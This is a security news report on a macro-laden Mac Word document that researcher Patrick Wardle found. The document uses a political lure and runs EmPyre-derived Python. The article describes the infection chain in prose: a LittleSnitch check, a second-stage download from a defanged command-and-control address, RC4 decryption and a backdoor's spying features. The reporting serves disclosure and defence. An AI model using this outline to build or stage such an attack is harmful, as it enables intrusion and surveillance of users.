Malware that exploits macro-enabled Office documents has been terribly common across Windows users. After turning into a common prevalence on Windows-based computers over the past few years, such malware is now targeting MacOS users too.
In the recent incident, Patrick Wardle, Director of Research at Synack came across a malicious Mac Word document titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm” that later identified a part of a malicious campaign targeting Mac users.
The recent attack works only on Mac versions of Word (attempts to execute on Windows or Pages, Mac-based productivity software similar to Word, fails).
The macro contains Python code, which appears to have been copied from the open-source EmPyre project. EmPyre is a legitimate open source Macintosh and Linux post-exploitation agent typically utilized in penetration testing engagements.
Once a user tries to open the attachment, they’re presented with a popup instructing to enable macro in order to view the document.
If the macro is enabled, it executes its python code which first checks the machine to make sure LittleSnitch is not running.
The python code embedded into the Word document then reach out to the command and control infrastructure at securitychecking[.]org[:]443/index[.]asp to download a bunch of second stage payload.
The downloaded code is then subjected to RC4 decryption and executed, finally.
The command and control site, however, has gone inaccessible so the researchers could not be sure of exactly what the second stage was, but it’s likely the remaining EmPyre components.
Talking about the second stage EmPyre components, Wardle told is a persistent Mac backdoor that is capable of grabbing browser history, turning on the webcam, keylogging, and dumping of hashes.
The IP associated with the securitychecking(.)org website that hosts the malicious payload appears to be geo-located in Russia. The site has been previously associated with cyber crime activities such as phishing and other malware downloads.
However, It’s still unknown who the attackers are behind this campaign. Security researchers suspect at the later time such campaigns may start delivering ransomware.